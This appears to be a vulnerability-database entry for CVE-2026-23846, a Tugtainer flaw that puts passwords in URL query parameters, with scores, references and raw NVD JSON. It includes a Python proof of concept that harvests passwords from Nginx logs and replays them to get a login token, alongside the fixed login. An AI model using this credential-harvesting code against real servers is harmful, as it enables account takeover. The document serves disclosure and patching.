CVE-2026-23846

Description

Tugtainer is a self-hosted app for automating updates of Docker containers. In versions prior to 1.16.1, the password authentication mechanism transmits passwords via URL query parameters instead of the HTTP request body. This causes passwords to be logged in server access logs and potentially exposed through browser history, Referer headers, and proxy logs. Version 1.16.1 patches the issue.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:quenary:tugtainer:*:*:*:*:*:docker:*:* - VULNERABLE

Tugtainer < 1.16.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-23846 PoC - Tugtainer密码URL参数泄露检测
# 攻击者通过分析日志获取泄露的密码

import re
import requests
from urllib.parse import urlparse

# 示例：分析Nginx访问日志查找泄露的密码
def analyze_nginx_logs(log_content):
    """分析Nginx日志，查找包含密码的URL"""
    # Nginx日志格式
    pattern = r'(\d+\.\d+\.\d+\.\d+) - .*?"GET /.*?(password|pwd|pass)=([^\s&]+)'
    matches = re.findall(pattern, log_content)
    
    leaked_credentials = []
    for match in matches:
        ip, param_name, password = match
        leaked_credentials.append({
            'source_ip': ip,
            'parameter': param_name,
            'password': password
        })
    
    return leaked_credentials

# 示例：模拟攻击者利用泄露凭证登录
def exploit_vulnerability(base_url, username, password):
    """使用泄露的凭证尝试登录Tugtainer"""
    # 错误方式：密码通过URL参数传输
    login_url = f"{base_url}/api/login?username={username}&password={password}"
    
    # 正确方式应该是POST请求，凭证在body中
    # login_url = f"{base_url}/api/login"
    # data = {'username': username, 'password': password}
    
    response = requests.get(login_url)
    
    if response.status_code == 200:
        token = response.json().get('token')
        print(f"[+] 凭证利用成功！获取Token: {token}")
        return token
    return None

# 修复后的正确登录方式
def secure_login(base_url, username, password):
    """安全的登录方式，密码在请求体中"""
    response = requests.post(
        f"{base_url}/api/login",
        json={'username': username, 'password': password}
    )
    return response.json() if response.status_code == 200 else None

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23846
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23846
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23846/
[4] VulDB https://vuldb.com/cve/CVE-2026-23846
[5] https://github.com/Quenary/tugtainer/commit/9d23bf40ac1d39005582abfcf0a84753a4e29d52
[6] https://github.com/Quenary/tugtainer/security/advisories/GHSA-f2qf-f544-xm4p

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23846", "sourceIdentifier": "[email protected]", "published": "2026-01-19T20:15:49.243", "lastModified": "2026-02-05T18:44:54.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tugtainer is a self-hosted app for automating updates of Docker containers. In versions prior to 1.16.1, the password authentication mechanism transmits passwords via URL query parameters instead of the HTTP request body. This causes passwords to be logged in server access logs and potentially exposed through browser history, Referer headers, and proxy logs. Version 1.16.1 patches the issue."}, {"lang": "es", "value": "Tugtainer es una aplicación autoalojada para automatizar actualizaciones de contenedores Docker. En versiones anteriores a la 1.16.1, el mecanismo de autenticación de contraseña transmite contraseñas a través de parámetros de consulta de URL en lugar del cuerpo de la solicitud HTTP. Esto provoca que las contraseñas se registren en los registros de acceso del servidor y se expongan potencialmente a través del historial del navegador, los encabezados Referer y los registros de proxy. La versión 1.16.1 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-598"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quenary:tugtainer:*:*:*:*:*:docker:*:*", "versionEndExcluding": "1.16.1", "matchCriteriaId": "B0EB5A8E-D461-4035-93D7-007BF202F58D"}]}]}], "references": [{"url": "https://github.com/Quenary/tugtainer/commit/9d23bf40ac1d39005582abfcf0a84753a4e29d52", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Quenary/tugtainer/security/advisories/GHSA-f2qf-f544-xm4p", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}